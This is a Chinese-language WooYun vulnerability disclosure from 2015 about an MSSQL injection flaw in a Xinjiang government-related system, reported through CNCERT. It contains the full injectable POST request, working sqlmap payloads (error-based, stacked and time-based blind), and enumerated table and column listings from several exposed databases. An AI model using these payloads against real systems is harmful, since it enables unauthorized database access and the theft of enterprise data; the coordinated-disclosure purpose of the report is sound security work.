当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158648

漏洞标题:新疆维吾尔自治区某系统MSSQL注入(涉及23个数据库)

相关厂商:cncert国家互联网应急中心

漏洞作者: 无名人

提交时间:2015-12-07 14:10

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

POST /dm/printview_X.asp HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 35
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/dm/deal_X.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSTAQCCT=KCEKKDABHPDIFKJIPOABOJAE
DealCode=121213*&Submit=%CC%E1%BD%BB


DealCode参数存在多种注入

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+C
HAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE C
HAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zh
KC&Submit=%CC%E1%BD%BB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
---
[22:13:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000

漏洞证明:

数据库.png


Database: tempdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.sysconstraints | 4 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: webcodecheck
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.t_jgdm_cysh | 307878 |
| dbo.SM_USERLOGIN_LOG | 4342 |
| dbo.tjlog_save | 3171 |
| dbo.t_njjhy | 1199 |
| dbo.t_pzjg | 1052 |
| dbo.t_jjhy | 1047 |
| dbo.t_gj | 474 |
| dbo.t_xzqh | 236 |
| dbo.SM_SYSOPER_LOG | 120 |
| dbo.t_bzjgdm | 109 |
| dbo.t_wtlx | 107 |
| dbo.SM_USERRIGHTKEY | 88 |
| dbo.t_hb | 72 |
| dbo.t_njjlx | 34 |
| dbo.t_jjlx | 30 |
| dbo.SM_CONFIG | 29 |
| dbo.t_njglx | 26 |
| dbo.SM_RIGHTKEY | 18 |
| dbo.t_jglx | 12 |
| dbo.SM_UGROLEDETAIL | 9 |
| dbo.sysconstraints | 7 |
| dbo.SM_BRANCH | 5 |
| dbo.SM_ROLE | 5 |
| dbo.SM_USERGROUP | 5 |
| dbo.SM_USERMANAGE | 5 |
| dbo.syssegments | 3 |
| dbo.SM_USER | 1 |
| dbo.v_rand | 1 |
+--------------------------------------+---------+
Database: CodeNianJian
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Deal | 1343392 |
| dbo.t_jgdm | 405154 |
| dbo.t_jgdm_tm | 298583 |
| dbo.t_jgdm_xb | 157809 |
| dbo.t_jgdm_ws3 | 9881 |
| codenianjian.t_jgdm_backws | 4663 |
| dbo.t_xzqh1 | 3259 |
| dbo.t_njjhy | 1199 |
| dbo.t_jjhy | 1047 |
| dbo.t_pzjg | 978 |
| dbo.t_xzqh | 117 |
| dbo.t_hb | 36 |
| dbo.t_njjlx | 34 |
| dbo.t_jjlx | 30 |
| dbo.sysconstraints | 22 |
| dbo.t_zjlx | 13 |
| dbo.t_jglx | 12 |
| dbo.syssegments | 3 |
| dbo.ManageUser | 2 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.backupfile | 66516 |
| dbo.backupset | 34961 |
| dbo.backupmediafamily | 34896 |
| dbo.backupmediaset | 34895 |
| dbo.restorefile | 97 |
| dbo.sysconstraints | 93 |
| dbo.restorehistory | 78 |
| dbo.restorefilegroup | 19 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: codechk
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.CodeOper | 154108 |
| dbo.Sys_EntryLog | 58650 |
| dbo.VIEW1 | 2888 |
| dbo.t_njjhy | 1199 |
| dbo.Sys_UserRole | 162 |
| dbo.Sys_user | 112 |
| dbo.Sys_RoleRight | 89 |
| dbo.t_hb | 36 |
| dbo.Sys_Module | 28 |
| dbo.sysconstraints | 13 |
| dbo.Sys_Role | 6 |
| dbo.syssegments | 3 |
| dbo.Sys_Dept | 1 |
| dbo.Sys_Unit | 1 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS | 2299 |
| dbo.spt_values | 730 |
| INFORMATION_SCHEMA.ROUTINES | 654 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 |
| INFORMATION_SCHEMA.COLUMNS | 379 |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 |
| dbo.spt_datatype_info | 36 |
| INFORMATION_SCHEMA.TABLES | 34 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 |
| dbo.spt_server_info | 29 |
| dbo.spt_provider_types | 25 |
| INFORMATION_SCHEMA.VIEWS | 25 |
| INFORMATION_SCHEMA.SCHEMATA | 24 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 |
| dbo.spt_datatype_info_ext | 10 |
| dbo.syssegments | 3 |
| dbo.spt_monitor | 1 |
| dbo.sysconstraints | 1 |
+--------------------------------------+---------+
Database: webcode
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.t_czjl_bak | 4282282 |
| dbo.t_czjl | 4245720 |
| dbo.t_lsls | 3529448 |
| dbo.t_zysh | 2325489 |
| dbo.t_zs | 1890425 |
| dbo.t_bgk_ls | 1842586 |
| dbo.t_hz_week | 1549480 |
| dbo.t_zsbhb | 1389852 |
| dbo.t_hz_day | 590643 |
| dbo.v_codecheckview | 365669 |
| dbo.t_hz_month | 363560 |
| dbo.t_cdsj | 362946 |
| dbo.tk_fzk | 345475 |
| dbo.tk_kxxk | 343016 |
| dbo.t_jgdm_bak | 337073 |
| dbo.t_jgdm_ls | 336992 |
| dbo.v_fkbz | 334165 |
| dbo.t_jgdm | 332534 |
| dbo.v_jgdm_all | 332534 |
| dbo.t_fzdm | 242270 |
| dbo.v_zhika | 191656 |
| dbo.v_writecard | 191390 |
| dbo.v_jgdm | 138733 |
| dbo.v_card | 117891 |
| dbo.t_sp | 110291 |
| dbo.t_black | 108832 |
| dbo.t_hteventlog | 89703 |
| dbo.tk_fkk | 75604 |
| dbo.tk_xgk | 73007 |
| dbo.t_email | 45976 |
| dbo.t_downloadlog | 10886 |
| dbo.t_qzjgdm | 8024 |
| dbo.txzqhmodule | 7749 |
| dbo.t_qtmdsource | 5453 |
| dbo.t_xzqh1 | 4195 |
| dbo.t_printset | 3311 |
| dbo.t_zsbhsource | 2634 |
| dbo.t_jglx_pzjg | 2534 |
| dbo.t_xzqh_bsx | 2430 |
| dbo.t_mdk | 2035 |
| dbo.t_zycp | 1462 |
| dbo.codebuf | 1412 |
| dbo.t_zsds | 1386 |
| dbo.v_jgdm_new | 1303 |
| dbo.t_njjhy | 1199 |
| dbo.t_jjhy | 1047 |
| dbo.t_pzjg | 1027 |
| dbo.trolemodule | 664 |
| dbo.c_s0101 | 652 |
| dbo.tuserinfo | 452 |
| dbo.tusermodule | 394 |
| dbo.tmodule | 306 |
| dbo.t_zssl | 294 |
| dbo.t_gj | 237 |
| dbo.sysconstraints | 215 |
| dbo.t_jgdm_save | 210 |
| dbo.t_mdsource | 140 |
| dbo.t_djgdm | 134 |
| dbo.c_s03 | 122 |
| dbo.t_xzqh | 119 |
| dbo.t_mdktemp | 116 |
| dbo.c_s01 | 115 |
| dbo.s_serial | 104 |
| dbo.t_zrxzqh | 98 |
| dbo.t_zszjze | 85 |
| dbo.v_bzjg | 84 |
| dbo.V_XZQH | 84 |
| dbo.ttable | 57 |
| dbo.trole | 44 |
| dbo.t_gscssz | 40 |
| dbo.t_operate_type | 40 |
| dbo.t_hb | 36 |
| dbo.t_njjlx | 34 |
| dbo.t_ljdm | 32 |
| dbo.tk_printset | 31 |
| dbo.t_jjlx | 30 |
| dbo.t_qtmdk | 26 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.tcss | 20 |
| dbo.t_jgdmpgsz | 16 |
| dbo.c_s02 | 15 |
| dbo.t_zjlx | 13 |
| dbo.t_cxkey | 12 |
| dbo.t_jglx | 12 |
| dbo.t_sclasttime | 9 |
| dbo.t_jglx_bsx | 8 |
| dbo.t_cflx | 7 |
| dbo.t_sppz | 6 |
| dbo.t_spdmtemp | 5 |
| dbo.syssegments | 3 |
| dbo.treport | 3 |
| dbo.t_gg | 2 |
| dbo.t_bajlb | 1 |
| dbo.t_htxtsz | 1 |
| dbo.t_lyb | 1 |
| dbo.t_pglasttime | 1 |
| dbo.t_system | 1 |
| dbo.t_zgjg | 1 |
| dbo.t_zsdj | 1 |
| dbo.tsysinfo | 1 |
+--------------------------------------+---------+
Database: thams
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| thams.P_FILE0 | 6653069 |
| thams.RECIVELOG | 1825664 |
| thams.E_FILE0 | 1728617 |
| thams.D_FILE0 | 1728208 |
| thams.TRANSFILELOG | 1318174 |
| thams.S_LOGIN | 594890 |
| dbo.VIEW3 | 525769 |
| dbo.text | 12874 |
| dbo.tst | 10486 |
| dbo.t_xwqy_04 | 9110 |
| dbo.t_gjzx_04 | 7488 |
| dbo.VIEW2 | 4781 |
| dbo.t_xwqy_01 | 3511 |
| dbo.t_jgdm20140811 | 1196 |
| thams.FLAGLOG | 258 |
| dbo.sysconstraints | 137 |
| thams.FTPUSER | 99 |
| thams.S_ALL | 65 |
| dbo.VIEW602 | 56 |
| dbo.xinjiang | 56 |
| thams.F_D_FILE0 | 50 |
| thams.F_X_D_FILE0 | 49 |
| thams.F_W_QT2 | 44 |
| thams.F_W_QT1 | 40 |
| thams.F_S_BORROW | 24 |
| thams.F_S_TMPRIGHT | 24 |
| thams.F_E_FILE0 | 22 |
| thams.F_E_FILEQT1 | 22 |
| thams.F_E_FILEQT2 | 22 |
| thams.F_S_DESTORY | 19 |
| thams.F_S_USER | 18 |
| thams.F_S_DALX | 16 |
| thams.F_S_REPORT | 16 |
| thams.F_S_LOG | 13 |
| thams.S_XTGN | 13 |
| thams.F_S_HSZ | 12 |
| thams.F_FLAGLOG | 11 |
| thams.F_S_FWQPZ | 11 |
| thams.F_S_MLS | 10 |
| thams.F_S_GL | 9 |
| thams.F_S_GZOPER | 9 |
| thams.F_S_DAOPER | 8 |
| thams.F_S_LOGIN | 8 |
| thams.F_Z_ZHKGL | 8 |
| thams.F_FTPUSER | 7 |
| thams.F_RECIVELOG | 7 |
| thams.F_S_DAWJKZDDY | 7 |
| thams.F_S_MROPER | 7 |
| thams.F_S_XHLC | 7 |
| thams.F_S_GROUP | 6 |
| thams.F_S_ROLERIGHT | 6 |
| thams.F_S_TBLCODE | 6 |
| thams.F_S_ZDDYFZB | 6 |
| thams.F_TRANSFILELOG | 6 |
| thams.F_Z_WSDGL | 6 |
| thams.F_D_CLASSIFY0 | 5 |
| thams.F_D_DHGZ0 | 5 |
| thams.F_S_MLNODE | 5 |
| thams.F_S_QZH | 5 |
| thams.F_S_XTGN | 5 |
| thams.F_S_XTPXZD | 5 |
| thams.F_S_ZTKML | 5 |
| thams.F_W_WJKGL | 5 |
| thams.F_Z_WSDFW | 5 |
| thams.CODECONV | 4 |
| thams.F_D_PATHCONFIG0 | 4 |
| thams.F_D_PXZD0 | 4 |
| thams.F_P_BGQX | 4 |
| thams.F_S_LJF | 4 |
| thams.F_S_NB | 4 |
| thams.F_S_PATHCONFIG | 4 |
| thams.F_S_ROLE | 4 |
| thams.F_S_TB | 4 |
| thams.F_S_USERROLE | 4 |
| thams.F_S_VFM | 4 |
| thams.F_S_WYFBZD | 4 |
| thams.F_W_PATHCONFIG | 4 |
| thams.P_MJ | 4 |
| dbo.syssegments | 3 |
| thams.F_D_FZZD0 | 3 |
| thams.F_D_WBX0 | 3 |
| thams.F_P_MJ | 3 |
| thams.F_S_NBTREE | 3 |
| thams.F_S_TJPROJECT | 3 |
| thams.F_SYSGK | 3 |
| thams.P_BGQX | 3 |
| thams.S_USER | 3 |
| thams.F_P_ZTC | 2 |
| thams.F_S_SHJZHHDY | 2 |
| thams.F_S_YUCODE | 2 |
| thams.S_ROLE | 2 |
| thams.SYSGK | 2 |
| thams.W_WJKGL | 2 |
| thams.ConverTB | 1 |
| thams.D_WBX0 | 1 |
| thams.PAGETABLE | 1 |
| thams.S_DALX | 1 |
| thams.S_FWQPZ | 1 |
| thams.S_MLS | 1 |
| thams.S_QZH | 1 |
+--------------------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Database: CodeNianJian
Table: Deal
[11 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ApplyTime | datetime |
| AuditTime | datetime |
| DealCode | varchar |
| DealDoc | varchar |
| DealStatus | int |
| Decision | int |
| ID | int |
| jgdm | varchar |
| UserName | varchar |
| UserSection | varchar |
| Zt | varchar |
+-------------+----------+


包含11W企业信息

企业信息.png


随便跑了两个数据作证明:

1.png

修复方案:

@@

版权声明:转载请注明来源 无名人@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-10 17:58

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给新疆分中心,由其后续协调网站管理单位处置.

最新状态:

暂无